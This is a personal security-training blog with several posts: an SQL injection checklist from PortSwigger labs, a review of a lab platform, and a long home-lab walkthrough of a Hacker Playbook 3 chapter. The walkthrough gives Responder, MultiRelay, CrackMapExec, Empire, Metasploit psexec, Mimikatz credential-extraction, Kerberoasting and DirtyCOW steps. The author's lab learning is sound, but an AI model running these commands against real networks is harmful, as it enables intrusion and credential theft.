Posted in Blog, PortSwigger

PortSwigger Web Academy – What have I gotten myself into? (SQLi)

So I’ve started working on the PortSwigger Web Academy because why not? Well, maybe because I’m (still) working on the IHRP stuff from eLearnSecurity and have started the THP course to help prep for that. Why do web app pentesting stuff? The short answer is because I think it nicely complements what I’m doing. Maybe I’m trying to justify my habit of chasing squirrels, but I’m seeing direct application already of what I’ve learned doing the SQLi section and what I need to do day-to-day. I am focused on the incident response/threat hunting/threat intel side of things, but I believe the info in the Web Academy supports those. It’s giving me ideas for things to look at and valuable hands-on keyboard stuff to go with the more theoretical stuff I’m doing to prep for IHRP.

I hope to script out the labs to get more practice with Python (one of the things I’m working on – those will end up on my GitHub), and I’m planning to make some short notes on here to kind of summarize what I’ve learned and how I’m applying it. The labs are excellent and build well (as in from one lab to the next) for the most part. There are some jumps, but solutions have been provided for every lab I’ve looked at so far. The community solutions are solid too. The community solutions aren’t available on all labs yet, but it looks like Rana Khalil and Michael Sommer are both working on getting labs done. They have different styles, but both are helpful.

Need To Know

The content helps with the labs, but there are sometimes jumps or connections that aren’t presented. Since the solutions are provided, it’s not bad. If you have the Web Application Hackers Handbook, it’s good to have on hand. You will also need Burp Pro to do some of the labs. It’s not cheap, but it’s not terrible. You can do a lot with the free community version, but there are some things you just can’t do with it. It’s also rate limited so some things will be painfully slow. Scripting can help but not completely. Scripting something out can mean it takes minutes instead of hours (and hours) in the Community version though. I’d recommend picking up the Pro version if possible.

Either way, take some time learning about how to use Burp Suite. Definitely tweak the options to set up the fonts and theme to your liking. I find the default fonts a little hard to read. And if you are a keyboard shortcut addict (like me), use the keyboard shortcuts and add your own. My little cheat sheet for keyboard shortcuts is here and includes the ones I’ve added to make my life easier (Burp is toward the bottom – I put everything here because it works for me).

I think someone with little to no technology background could do these, but it would be very frustrating. With the solutions, getting through the labs without knowing what you are doing is possible, but I don’t think that would help with either passing the certification or developing a solid skillset. If someone were to use the content in the Learning Path as a guide, I think you could go from limited skills to a decent set of web app pen testing skills (to use for bug bounties for example). I think supplementation would be necessary.

My General Approach

I try to at least get started on my own, but I go to the solutions after a bit. That’s just the reality of my limited time. I’ll do what I can without looking, but I’m not willing to spend hours tracking stuff down. Initially at least. The good thing about the PortSwigger provided solutions is they are broken into steps so you can unhide to get an idea of where to go next and hide again to see how far you can get with that breadcrumb. The solutions also don’t give exactly what to do (because of variability in the labs), so you can’t just point and click your way through. I used them to work through the first section (SQLi), and then I went back through using the Khalil videos on a couple to improve my understanding. After a few of those, I decided scripting the exploits would force me to understand the process more deeply, so I went that route. Plus Python practice. I do recommend going through the content before the associated lab – that will help quite a bit. If you are experienced pentesting web apps, it might not be worth the time.

My goal is to get the information in an efficient manner, and this approach works well for me. I repeated the labs until I could solve them quickly and consistently to ensure I had the concept down. If I didn’t understand something, I went searching so I understood what was going on. I feel a little bleh about going to the solutions, but I have to prioritize where my time goes. Yes, I’m rationalizing. No, I don’t care. At least not enough to not do it.

SQLi Takeaways

The biggest takeaway is to have a framework/methodology. The labs hint at this by their order and scaffolding. I think the biggest disconnect between the labs and real-life pentesting is the labs told you where to look. Burp Scanner is incredibly helpful, but if you don’t understand how the exploits work, having the payload provided may not be enough. A big bonus of working through this section was getting really familiar with BurpSuite. I’m still not great, but I’m much more comfortable with it than I was. I think that will help make future labs a little bit easier since I’m better with the toolset.

My general framework for checking for SQLi manually:

  1. Poke around and see possible injection points – use Burp Proxy, Inspector, etc. to see where I can mess with things.
  2. Try things that will work for each of the popular database types (Oracle, MySQL, MS, etc.).
  3. Try messing via basic injections like ', '--', ' OR 1=1-- to see if it breaks anything.
  4. Depending on what happens in earlier steps, determine if UNION approach might work, if so try UNION approach.
    1. Try to determine columns using ORDER BY.
    2. See if any columns take text using UNION SELECT null,'a' approach.
  5. If nothing is obvious, try basic blind SQLi attacks.
  6. If still nothing, give the DNS lookup option a shot.

Depending on what you are doing, using a scanner might save you valuable time. But scanners can sometimes be problematic (or too noisy when pen testing). If you use Burp Scanner, make sure you look through the options. The default scan doesn’t take the everything but the kitchen sink approach, so if you have an idea of what to look for, you may want to customize the scan.

I probably won’t be doing a lot of lab explanations/walkthroughs. I think looking at how people approach the problem is helpful, so I might jot down a few notes if I have time, but more than likely, I’ll throw scripts on GitHub (probably with more documentation than is Pythonic) and section reflections here.

Going Forward

How long will it take to finish all the sections? Kind of feel like forever given it’s not my primary focus. But it’s fun and a nice way to shift my focus and wake my brain up a bit. The scripting practice is really good for me.

I would definitely recommend this if you want to get into web-app pentesting. It’s a good way to get practice even if you stick with just the Community version. If you are a staunch blue teamer, it might not be the best use of your time, but I think it’s helpful to switch things up occassionally.

Posted in Review

LOD – Learn on Demands Systems Review

I do a LOT of labs. I think labs are critical for developing skills and help you learn ways to effectively execute proof of concept trials. Plus it’s the only way you can work on a lot of things without risking messing up something in production. I’m a big fan of building out home labs using virtual machines and cloud hosting, but sometimes pre-built labs are a better choice because of time or skill constraints to set everything up. I’ve been doing a bunch lately from Learn on Demand. So I wanted to share a few thoughts on the platform for those looking to develop training that will use labs. The info is good for students too, but the platform is really more for those developing training.

Sidenote: I’ve been doing these through Cybrary (where I’m a TA), so they haven’t been purchased through a class or other training.

The Good

I’ve found these labs to be well done with stable environments. I’ve had a few with issues, but for the most part the labs run smoothly. There are a lot of pre-built labs covering a lot of platforms. There are typical labs where you work through the tasks with instructions. There are also “IT Pro Challenges” where instead of the steps you get directions about what to do without the steps. The different levels of these vary with how much help you have available and seem appropriately challenging.

They also make a decent number of labs available to try for free. You have to enter contact enter to get a link, which I’m not thrilled about, but I understand. The free labs include options for AWS, Azure, and Linux. So you can get a really good idea of what the labs look like. From a student’s perspective, it gives you a chance to pick up some new skills for minimal/no cost.

There are lab offerings for several specific training courses, including Microsoft…but they aren’t really available for purchase as an individual.

The Bad

Finding cost info for these labs is very difficult. I’ve yet to find a way without having to submit info. I don’t like that approach, but given the platform is more for instructors to offer labs to classes they are teaching than for students to purchase labs, I do understand it. Just not really a platform for students to pick up labs.

Occasionally I’ll run into issues with virtual environments taking a long time to load or not functioning properly. I’ve found the issues to be less common on this platform than others I’ve used. And I’ve found support to be very responsive when contacted. Even when things are a bit slow to load, the time allotted is usually more than enough. There is only 1 lab I can think of where I ran out of time because the lab architecture was being crabby.

Just like any lab with virtual machines, using keyboard commands can get interesting. Figuring out which CTRL key stays with the VM can make the labs an adventure, but I don’t often find this to be an issue. There have been a few times when entering a CTRL command resulted in my browser window closing. A little annoying, but I was able to relaunch and pick up where I left off.

The Verdict

Bottom line, I like when I am taking a training that uses Learn on Demand labs. I know the labs will be stable and well done. I would like for the platform to offer a way for students to easily access the labs without going through training, but I understand this isn’t the focus. There may be more options available if you go through contacting the sales, but I haven’t tried that since I have access through other means. I can see using the labs to verify skills when interviewing for positions or to assess where a new employee needs training. I really like the challenge approach to the labs. The different levels (Getting Started, Guided, Advanced, and Expert) build well and offer some clear learning pathways. I’ve found that by working through the Getting Started and Guided challenges on a topic I’m usually in really good shape for the Advanced and Expert labs.

Probably the best thing I can say about Learn on Demand is that I would consider their labs if I were developing training. Having taught online for a good while, I’m quite picky about the resources I use. I would have no problem using LOD as the platform for my labs, and the availability of pre-built labs makes it a great way to save a bit of time on class prep.

Posted in Blog, Resources, THP3

THP3 Ch 4 Review

Disclaimer: Educational purposes, personal reference, don’t do illegal hacking, IANAL, etc.

Note: THP3 is my primary source for this. I’m putting my thoughts and notes to help me remember the info while avoiding putting too much info from the book here. If you are considering buying the book, I highly recommend it. 

THP3 04 – The Drive – Compromising The Network

The focus of this chapter will be corporate environments and living off the land. A definite red team focus. I’m looking forward to working through THP2 once I’m done with this to fill in some blanks. There won’t even be a vuln scan run in this chapter, which is great because it helps avoid detection.

I’ll say upfront that this was a very frustrating chapter. Not because of what Kim covered, but because of the nature of setting up a more complicated virtual environment. Setting up the network was doable, but doing a mini-setup means there’s not a lot going on in the network. So a lot of the tools will likely work better in an actual environment than in the lab. Since I was also working with the current versions of the various Windows systems, there were likely some exploits that have been dealt with. I’ve spent a lot of time working through the tools and have them “working”, but not necessarily getting what they should on the network. Luckily I’ve got some labs available in a certification that I’m working on that I’ll be able to do some additional practice on. The experience with the tools and troubleshooting is invaluable, but it is frustrating when things don’t work like they should. It did lead me to chasing some alternatives and learning a ton. So in the end, it’s all good. I’m okay continuing to bang away at this while continuing in the book. I’ll take notes, keep track of tools, and apply the info as I’m working on other labs.

Finding creds outside the network

First up is getting an initial entry point. It can be complicated and resource-intensive. Kim recommends KISS. And goes straight to password bruteforcing. This makes sense given all of the authentication required with various enterprise services. And finding things that are authenticated using the victim’s sign-on info can provide a foothold. This will involve password spraying. Going after external sources is helpful because the log-in attempts might not be logged, stuff on the peripheral might not require multi-factor authentication, people reuse passwords, and account lockout might not be enabled. In short, external sources often have a lower security level.

Kim notes that the fake mail server doesn’t exist anymore, so I feel like testing options are limited here. I’ll go back and research options for testing mail servers later.

Spray from SpiderLabs is a password spraying that supports multiple enterprise services (OWA, Lync, CISCO Web VPN, etc.). Passwords to use should be chosen based on the company. Kim reports commonly successful passwords as those including season and year, local sports team and digits, looking at older breaches and using similar passwords, and company name plus year, numbers, and/or special characters. It’s a good idea to run these scans slowly to avoid lockout. Seems like a good use of a server. Spray includes user and password files in several languages. Make to take a look at the password files and update as appropriate with the current year and potentially sports teams as mentioned above.

To configure Spray, you’ll need to capture a POST request for a password attempt (use Burp or ZAP) and save the data to a file. Check out the README for Spray to get the details of how each spray option would need to be configured. I went through targeting the practice website. Script worked fine – just slow going.

Ruler by Sensepost can also do bruteforcing and can do some persistence exploitation as well. It does some autodiscovery of Exchange configuration and looks for creds. It’s a pretty cool tool. I’m going to have to find a way to do some work with both of these on test environments.

Moving through the network

This will be exploitation that occurs after gaining access to the network. It’s time to do some network setup. Microsoft licensing means it’s hard to find Windows VMs, and you have to build the network yourself. This has been on my to-do list, so it’s nice to have to do it for book club. I suspect I’ll need to pull in some additional resources. All of the Windows options expire after a set time.

First up, the server. Kim addresses Windows Server 2016 in THP3 and Windows Server 2012 in THP2. Microsoft provides VMs to test Edge and IE. They expire after 90 days, but Microsoft recommends creating a snapshot when first installing the VM to roll back to. That’s what I’ve done previously. You can get demo ISOs for the servers from Microsoft. I recommend taking snapshots frequently as you go. While walking through the entire setup process when you’ve forked something is educational, it can get old. Also check your time settings when your VMs to avoid time sync issues.

A few helpful walkthroughs dealing with VM setup and Windows Server 2016 from Couchbase and a Microsoft TechNet Wiki that includes complete lab setup info. Once you’ve got the VM loaded, time to set up Active Directory. Then add users using Active Domain Administrative Center or PowerShell. I found the PowerShell option quicker – just note the changes won’t show up until you refresh the management center.

 New-ADUser -Name "<name>" -SamAccountName "<name>" -AccountPassword(Read-Host -AsSecureString "Input Password:") -Enabled $true
 New-ADGroup -Name "<groupname>" -SamAccountName "<groupname>" -GroupScope "<scope>"
 Add-ADGroupMember -Identity <groupname> -Members <member1>,<member2>,<member3>

AD setup was surprisingly straightforward and intuitive (I’m sure I’ll regret saying that as I do more network setup), so onto setting up the client machines. This was a bit more finicky – make sure you’ve got everything on the same network and the network is set to private – which is annoyingly obscure on Win8.1. You’ll need to set your boxes to use the server as the DNS. Or at least that’s what I had to do because just adding it to the hosts file didn’t cut it. Luckily I’ve got a few more VMs to set up that I’ll continue figuring out the correct sequence. Sidenote – I’m also remembering just how much I disliked Windows 7 and 8.1.

Joining the domain once you’ve got the network lined up is pretty easy – Control Panel > System and Security > System > Advanced System Settings > Computer Name. Then click “Change” and select the Domain option. You can put in either the FQDN or the NetBIOS name. If you are having trouble using the NetBIOS option, try the FQDN.

Dealing with GPO…open up Group Policy Management in the server. Kim has the GOP set to disable firewall, disable AV, disable updates, add the Helpdesk group to the local admins group, and link the GPO to the root domain. Going forward, I’ll setup the GPO before adding other boxes to the network.

Important Steps for Setup

  • Download your VM builds (clients) and an ISO for the server from Microsoft

  • Load VMs – take snapshots before starting for the first time

  • Setup domain controller on server – set up static IP for server and set it to be the DNS server

  • Setup active directory on server

    • It would be a good idea to give the server a name that’s easy to remember, just makes life easier.

  • Create users and groups

  • Setup group policy (see below for details)

  • Setup clients to to join domain

    • Put all on Host-Only network (Not required, but is my preferred option; could also do a NAT network)

    • Set up server to be DNS server (Network Connections – Change settings of this connection – Adjust IPv4 settings)

    • Make sure the network is set to private (start setting up sharing and it should ask if you want to make it private – Network status – View Network computers and devices). It’s not as straightforward as it is for WiFi, so you may have to dig around a bit.

    • Control Panel – System and Security – System – Advanced System Settings

      • Change name to something specific

      • Click on Domain radio button and put in domain name

  • Clone client machines as desired

Set up group policy on server

  • Open up Group Policy Management

  • Edit an existing GPO or create a new one

  • Disable AV – Computer configuration > Policies > Administrative Templates > Windows Components > Windows Defender > Real-time Protection

  • Disable Firewall

    • Computer configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall

    • Computer configuration > Policies > Windows Settings > Security Settings > Windows Firewall > Protect all network connections > Disables (set for Domain Profile and Standard Profile)

  • Disable updates – Computer configuration > Policies > Administrative Templates > Windows Components > Windows Update

  • Add Helpdesk to local admin group: Computer configuration > Preferences > Control Panel Settings > Local Users and Groups

    • New > Local Group > Administrators (Built-in)

    • Make sure action is Update

    • Add desired group

  • Only allow local login for Domain Admins, Local Administrators, and Helpdesk: Computer Configuration > Windows Settings > Security Settings > Local Policies > User Rights Assignment > Allow Logon Locally

  • Enable file and print sharing: Computer Configuration > Policies > Administrative Policies > Network > Network Connections > Windows Firewall > Allow inbound file and printer sharing

  • Disable SMB signing

    • SMB v1 disabled through a registry item in the GPO

    • SMB2 seems to need to be modified in the GPO to avoid breaking the policy

      • Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options

  • Make sure the GPO is linked to the domain

Overall, not too bad for the first time through. I got some errors about automatic logon, but I’m okay leaving that off since it wouldn’t likely be on in an enterprise environment.

On to installation of Internet Information Services (IIS)…Kim provides a link to a walkthrough. Run this command on your server, then make sure it worked by going to the IP in a browser.

 Install-WindowsFeature -name Web-Server -IncludeManagementTools

It also says to configure SPN (Service Principle Names). I connected the IIS server to a host header.

 Setspn -A HTTP/<hostname> <iisServerName>
 Setspn -A HTTP/ csklabserver

I also set up a file share just to do it. I may go back and add a few things to the network, but this was a good start. Getting the GPO setup was the most fiddly part. I ran into some issues where my server decided to go on a field trip and I had to fix the time settings, but otherwise it went smoothly.

On The Network With No Creds

First up is doing some digging around the network without creds. This is working from getting on the network in whatever way and digging around. This could be from physically infiltrating the site or other methods.

Responder was the first tool. It worked well. Just a matter of waiting for something usable. You can either catch hashes and crack them or set up a popup to ask for creds. Not stealthy, but would get the job done. Once you play with this a little, it’s fairly easy to use. I did have to install some tools to get Responder running without complaint – hcxtools and hcxdumptool. That was on my 64-bit Kali VM and I couldn’t recreate the issue on the 32 bit. A little odd, but reinforces the importance of testing your tools and knowing your setup.

Get to the Responder directory (/usr/share/responder in regular Kali build), start Responder, get the info, then use Hashcat or similar to crack the NTLMv2 hashes. Hashcat has a ton of options, so take a look at the details. (Side note – you might also want to check out Crunch to generate custom wordlists if you can find out about the password policies in place or OSINT info on the accounts you capture hashes for.)

 ./ -I <interface> -<options>
 hashcat -a <attackmode> -m <hashtype> <filetocrack> <wordlistfile> -r <rulefiles>

The Multi Replay option was much more of a pain to get working. I played with this quite a bit before a friend said he thought it only worked on Windows 2012 and earlier servers. This made sense to me because when I ran RunFinger to check the network, the only target identified was my WIn7 box. So I had to download the ISO for 2012 and spin up a new VM for it. And add it as an additional domain controller. Good networking practice at least. Things got a little wonky, so I decided to start again using my Win2012 server as the initial DC. Got that setup as above, get the VMs back on the domain, and I was able to get MultiRelay working. Major lesson learned – know what all SMB is doing on your network before messing with it. There are quite a few things with SMB1 dependencies, so even though it’s recommended to disable it, that can cause major issues. But the issue for MultiRelay is SMB signing, so that is what needs to be disabled in the GPO. I spent way more time messing with this than I should have, but I wanted to understand what was going on and what made the network vulnerable. I was able to get a Win2016 DC added to my 2012 network and use MultiRelay to get a shell on there. When you start with newer versions of Windows, the things that let MultiRelay work aren’t there anymore. Trying to access my share with Windows 10, I basically got a security warning that said “nope”.

MultiRelay related commands:

 # Start Responder in another terminal from responder folder
 ./ -I eth0 -rv
 # User RunFinger if desired to id targets; run from responder/tools folder
 ./ -i <IPrange>
 # Run MultiRelay from responder/tools folder
 ./ -t <targetIP> -u ALL [-c <commands or payload>]

A few more references…

User Enumeration Without Creds

Nmap has a script to enumerate users. Once I got the syntax, this worked well. The main limitation is having a viable userlist. The default list pulled the administrator account. Combine this with some OSINT, and you should be able to enumerate the users. Only issue is watch the syntax.

 nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='realmname' <DomainControllerIP>

If you have a wordlist (like the Metasploit namelist provided on Kali), you add ,userdb=<filename>.

 nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='thp3lab',userdb=/usr/share/wordlists/metasploit/namelist.txt

Scanning the Network with CrackMapExec (CME)

This focused on using Empire’s REST feature, so I’ll be going back to play more with CME because there a lot of options. I’m using my Kali VM since I’m using VirtualBox. There’s a nice writeup here on the basics. Note – I had to use crackmapexec to call the program rather than cme as in the book, depends on how you install. I got a KeyError: 'launcher' error. Did some digging and found a fix. Looking at the comments, it seems Empire changes regularly, so any tools used with it should be checked before they are needed. The fix did work – you have to make a couple edits to the /usr/lib/python2.7/dist-packages/cme/modules/ file (see the link for details). I got it to run with Empire, but it didn’t seem to connect. I think I may need to spend a week just messing around with Empire – it seems to be rather finicky.

Setting up the listener in Empire was a little fussy. Between the book, the Getting Shells 101 CME documentation, and general troubleshooting, I got my listener going. Make sure you’ve setup the cert in Empire. I ended up resetting Empire and generating a new cert.

 cd /opt/Empire

Then start Empire and setup the listener. Make the password whatever is in your config file for CME.

 ./empire --rest --password 'password'
 (Empire) > listeners
 (Empire: listeners) > uselistener http
 (Empire: listeners/http) > set Name cmeTest
 (Empire: listeners/http) > set Host <YourIP>:<Port>
 (Empire: listeners/http) > set Port <Port>
 (Empire: listeners/http) > set CertPath <CertPath> # default is data
 (Empire: listeners/http) > execute

CME also has a Meterpreter module. I gave that a shot since I’m pretty comfortable with Metasploit. Basically set up a handler, then run the CME using the metinject module. I wasn’t able to get a shell with this either, so I’m going to have to play with this some more. Both say the payloads have been executed, but no connection is made in either.

 crackmapexec IPrange -u username -p password -M <module> -o <options>
 crackmapexec -u user1 -p password -M empire_exec -o LISTENER=test #listener name
 crackmapexect -u user1 -p password -M metinject -o LHOST= LPORT=8443

You can also use Metasploit to see where the creds are valid using the smb_login module. CME is much faster though.

 msf > use auxiliary/scanner/smb/smb_login
 msf auxiliary(smb_login) > set RHOSTS <IP range>
 msf auxiliary(smb_login) > set SMBDomain <domain>
 msf auxiliary(smb_login) > set SMBUser <user>
 msf auxiliary(smb_login) > set SMBPass <password>
 msf auxiliary(smb_login) > services -p 445 -R
 msf auxiliary(smb_login) > run


I went chasing squirrels to better compromise the network. I didn’t get the foothold I wanted with the book’s tools, so I went looking for options. A friend had mentioned Impacket as an alternative to MultiRelay. Raj Chandel has a nice beginner’s guide, but like many of the guides the focus is listing what the tool does rather than putting it into practice. Metasploit Minute has a YouTube video that walks through some of the examples. I’ll keep working with this and the other network attacks. I like Impacket a lot and will keep exploring its capabilities. Once you get the hang of the syntax, it’s really easy to work with.

Found this nice write-up on using creds to own Windows boxes. I used the winexe option to get a shell and then used Empire to generate a one liner. I was able to get an agent established and send commands using modules on my Win7 box. I didn’t get the expected results though. Another step in the right direction at least. I suspect that the way I have my network setup doesn’t have the necessary SMB vulns to make this work.

 winexe -U domain/user%password //IP cmd.exe
 # In Empire
 usestager multi/launcher
 set Listener http

I suspect a lot of the issues I’m running into have to do with working with a small network with limited modification. It also seems like with SMBv3.0, things get a lot less effective. I got multiple errors putting the launcher code into the systems I had shell on.

Since I did have creds, using the psexec module in Metasploit worked well. I did have to specify the domain though.

 msf > use exploit/windows/smb/psexec
 msf exploit(window/smb/psexec) > set RHOST <targetIP>
 msf exploit(window/smb/psexec) > set SMBPass <password>
 msf exploit(window/smb/psexec) > set SMBUser <username>
 msf exploit(window/smb/psexec) > set SMBDomain <domain>
 msf exploit(window/smb/psexec) > run

This let me easily upload the Empire payloads, but I got errors with several of the options.

A list of related references in no particular order for future reference…

After Compromising Your Initial Host

Lots of info here about what to do once you have a shell. There’s also info about a Github repo script with a lot of the commands from The Red Team Field Manual that can be used to search for commands from the book. I also found another Github with RTFM inspired cheat sheets. I just got copies of this and The Blue Team Field Manual, and it’s nice to have an idea of how to make the material more portable and easier to search. Pretty cool.

Privilege Escalation

Getting from a regular user to a privileged user is always a goal.

Methods Kim listed

  • Unquoted service paths

  • Finding insecure registry permissions for services

  • Check if the AlwaysInstallElevated registry key is enabled

I didn’t go digging too much with these on my network because there was a Privilege Escalation lab using Metasploitable3. So onto that…

Privilege Escalation Lab

Getting Metasploitable3 up and running can be a little more finicky than other VMs. It’s not difficult, just a little different. I think the intro blog from Rapid7 has the simplest install instructions. I did have to adjust the network adapter used, but nothing significant. There are a lot of options in Metasploitable3 and lots of resources online to go through.

Running an nmap scan showed lots of open ports. Kim chooses to target ManageEngine. Searching ManageEngine in Metasploit shows several potential exploits to use. Kim chooses the connection_id option to explore. This works, but isn’t privileged, so onto checking out processes with ps. Kim points out Tomcat and that you can google to find where user info is stored. Then using dir to search for the file and type (basically the Windows equivalent to cat) to display it. Use the creds found to login to the Tomcat management console to make sure they work…ok, how to do that? The easiest option is going to a browser. There are CLI options, but it didn’t seem to be setup on the box. The browser was easier. Creds worked, so back to Metasploit to repeat the process with Tomcat. And get a connection error because Metasploitable3 decided to take a break. Get it back up and running, and the exploit worked as expected.

It was great to work with Metasploitable3 a bit. There’s definitely a lot to work with, so it stays on the list of things to work on. This chapter has been great to get a more extensive home lab built up. Having that experience will help me build a solid testing network on an old server I have.

Pulling Clear Text Credentials from Memory

Mimikatz has been an effective tools for getting passwords, but it doesn’t work with Windows 10. To get the passwords back in LSASS, you can adjust the registry key. It just requires the user re-login. Locking the workstation is the easiest way to accomplish this triggering a lockscreen (rundll32.exe user32.dll,LockWorkStation). Then run Mimikatz again to get the passwords.

Mimikittenz is a tool to get passwords from target processes, like browsers. You can also write search expressions within Mimikittenz. And it doesn’t require local admin access. But you have to get the script onto the box.

I used the psexec module in Metasploit to get to where I could use Mimikatz. I did some work in both Win7 and Win10. I had to migrate meterpreter to a 64bit process in Win10. I could load and run Mimikatz. It did warn me I was using Mimikatz on a newer OS and recommended Kiwi instead. Running Mimikatz didn’t get usable info (which was expected). I gave Kiwi a shot as recommended, and was able to get hashes.

I have been able to use Mimikatz in other labs, and it works well when the conditions are right. Kind of like most tools.

Getting Passwords from the Windows Credential Store and Browsers

The Windows Credential Store is where usernames, etc. are saved when MS IE or Edge save your info. Info is accessible by the user. There are scripts available to get the info – Get-WebCredentials and Gathering Windows Credentials. Empire also has an option to get creds from Chrom (payload powershell/collection/ChromeDump). There are also tools available to extract cookies and get info from file sharing utilities.

Getting Local Creds and Information from OSX

For understandable reasons, most resources, including THP3, focus on Windows. That’s what is found in most enterprise environments. But Macs exist and may be fairly prevalent depending on the environment. There are similar attacks to get info from Macs. Kim talks about using Empire to target Macs, specifically setting up an Office macro payload – launch Empire, get a listener going, then usestager osx/macro, set OutFile /tmp/, and generate the payload. It’s Base64 code executed by Python, which is installed by default on Macs. Pop open Excel, create a macro, and swap out your payload for the macro code. Then save as an xlsm. I don’t have a Mac to test on, so just an interesting read for now. I’ve not had luck finding options for testing on Mac OS unfortunately, so until I can find a way, at least I’ve got some ideas.

Living Off of the Land in a Windows Domain Environment

This section focuses on using PowerShell Empire, but the takeaway is that if you can upload PowerShell scripts, you can do a lot of damage.

General notes as I continue to play with things…

Service Principal Names

Service Principal Names can provide info on databases and web servers. The setspn.exe file can be used – it’s on Windows by default, so handy to avoid having to deliver payloads. Basic format is

 setspn -T <domain> -F -Q */*

T specifies the domain, F sets queries to be at the forest rather than domain level, Q specifies each target domain or forest, and */* queries everything. There are a lot of other options, so it might be helpful to check out the Microsoft wiki on setspn.

Querying Active Directory

This section focused on Empire and using PowerView. Since Empire is still giving me fits (meaning getting Empire payloads to work and get active agents), in the interest of time, I decided to use some of the other tools to do similar works. Instead of using Powerview to get info about Active Domain users, I used an Impacket example. The GetADUsers example will get info about the AD users including password last set and last logon dates. PowerView has queries to get user, group member, and computer info. It is another one of those things I’ll keep working with as I’m troubleshooting Empire. There are also Metasploit modules available to do similar tasks (in the post/windowsgather group).


This is a cool way of graphically looking at things. I used it for SANS 2018 Holiday Hack (KringleCon) – one of the exercises involved analyzing a Bloodhound file. It’s definitely handy. From a defense perspective, this would be very helpful to identify potential exploitation paths. It can be run through Empire and with a faster C# option (Sharphound). The ingestor has to be on the host system and multiple files are generated that then need to be pulled over for analysis. The wiki is a great resource and is what I used for KringleCon. Kim provided files to work with. Unfortunately they are in CSV format, and Bloodhound 2.0 only takes JSON. I may go back later and convert the CSV to JSON, but for now I’ll move on since I worked with Bloodhound for KringleCon. The built-in queries are useful, so the tool is easy to get functioning once you have the files.

Some additional Bloodhound resources from Kim:

Moving Laterally – Migrating Processes

When you have a box with multiple users, it’s common to make/migrate tokens of different users. Metasploit can do this with the incognito module. Empire uses steal_tokens. According to Kim, this can break shells, so it’s a good idea to inject a new agent into a process owned by a different user. Empire’s PSInject can be used for this.

Moving Laterally Off Your Initial Host

The simplest option to pivot is using the permissions of the current user to get another box. There are options for this in Empire (the find_localadmin_access module) and Metasploit (local_admin_search_enum). Empire also has a lot of other options, so it’s a matter of spending time with it. There is also an option using Windows Management Instrumentation (WMI) in Empire.

Lateral Movement with DCOM

Distributed Component Object Model (DCOM) is another option for moving laterally. DCOM applications can be checked in PowerShell using Get-CimInstance Win32_DCOMApplication.

Some resources for learning more…


Hashes are fairly easy to get – Mimikatz and Responder have both been used to grab hashes in this chapter. The hashes can be passed using either Empire (powershell/credentials/powerdump) or Metasploit (exploit/windows/smb/psexec). This is an older method, but may still be encountered.

Gaining Creds from Service Accounts

This sections talks about Kerberoasting. Powershell is used to pull ticket info into memory. PowerSploit could also be used. Then Mimikatz can be used to export the tickets. Then the tickets have to be downloaded for cracking. The hashes can be cracked with tgsrepcrack, John the Ripper, or Hashcat. There is also a module in Empire to do this.

Dumping the Domain Controller Hashes

Multiple options here. You can run commands on the domain controller and use Shadow Volume/Raw. NinjaCopy and DCSync can also be used.

Lateral Movement via RDP over the VPS

Back to that VPS setup earlier…basically infect host, SSH from attacker to the VPS, set up local port forward, set up port forward in Meterpreter, and open RDP on the attack box. It’s more involved than that, but that’s the basic approach.

Pivoting in Linux

dnscat2 and Meterpreter have their own forwarding. An SSH shell could be used with local file inclusion or remote code execution. There’s a mimipenguin tool similar to Mimikat to pull creds.

Privilege Escalation in Linux

Same basic approach as Windows. LinEnum is a big help to look for possible routes of exploitation. It does return a lot of info in my experience, but I’ve found it helpful in CTFs I’ve done. Kim also mentions Linux Exploit Suggester, which I’ve come across before. Raj Chandel has a great blog post on Linux privilege escalation that provides some additional options. Kim talks about DirtyCOW, which involves a race condition. The only problem is it can cause kernel panics, so you need to match the version to the kernel.

Linux Lateral Movement Lab

I had to switch these VMs over to VirtualBox. That turned into a bit of an adventure, so it turned into a separate blog post on converting VMs and dealing with IPs in a virtual lab. Just another hurdle to getting through this chapter. Good practice, but not exactly on-task. You do need sudo access to edit the interfaces file, so luckily Kim provided login info. There are likely other ways of doing it, but I didn’t want to spend any more time digging than I already had.

Scan the network, see what’s open. Check out the box that has a webserver setup. Several services running. Kim says a web fuzzer showed openCMS running Struts2, which has been involved in breaches before. Check Metasploit for an associated module, and give it a shot (struts2_content_type_ognl). Just running it with the default options, I didn’t get anywhere. When I kept reading and followed Kim’s steps, I still didn’t get anywhere. Or so I thought – this exploit will not show in Metasploit. It reports that the exploit was completed, but no session was created. Reading on to get the tidbit about going back to dnscat, I got everything working. I should remember to skim over the sections before I start when it’s been awhile since I read it. The dnscat shell is a bit slow, so there’s some patience required. Everything worked as it should, so on to DirtyCow. Had to switch over to a NAT Network for this so I could fetch DirtyCow. I ran into issues with wget being unable to resolve the host address. It seems that sometimes Ubuntu 16.04 and up has issues with DNS in VirtualBox. I decided that rather than track down a fix, I would just use my VPS since I can use its IP easily. Using that, I was able to get the DirtyCow exploit to work and add the suggestions Kim has to make the exploit more stable.

Following Kim’s direction, I was able to get over to the Jenkins box with out issue. Pulling up the Jenkins site using port forwarding was incredibly slow. Like so painfully slow you think it died slow. But I was able to see what I was supposed to see. I was able to get all the way through following Kim’s walkthrough. I followed his instructions the first time through to get through quickly since DirtyCow can be unstable. I’ll take more time to look around as I come back to the lab. The ending point from the book’s perspective was getting an .ibd file. I believe the database can be recovered from the .frm and .ibd files available as the db_backup user, but that will require some research

Wrap Up

Completing this chapter was a marathon effort. I think I’ve been working on it off and on for a month. It was a combination of maddening and frustrating. It was great because I learned a lot. But it was frustrating trying to track down why things weren’t working. Working with Active Domain and setting up a network was good experience. Taking that over to a server where I can build out a more complete network will be great. I had one or two servers plus several workstations going at once, but running all that with Kali did kill all my RAM and result in paused VMs. Not surprising.

Next Steps

  • Dedicate some time to Empire

  • Build network on server

  • Keep working on everything

  • Rejoice that chapters 5 and 6 are relatively low-key
Posted in Blog, Resources

Lab Troubleshooting – Converting and IPs

Part of learning is labbing. There is a lot of practice that can be on online through a browser, but there’s often a need to use a virtual machine. There are a lot of write-ups on the basics of VM setup. I want to do a quick run down of 2 issues I’ve come across recently getting a VMWare machine converted to VirtualBox and adjusting the IP address of the VM.

Converting VMs

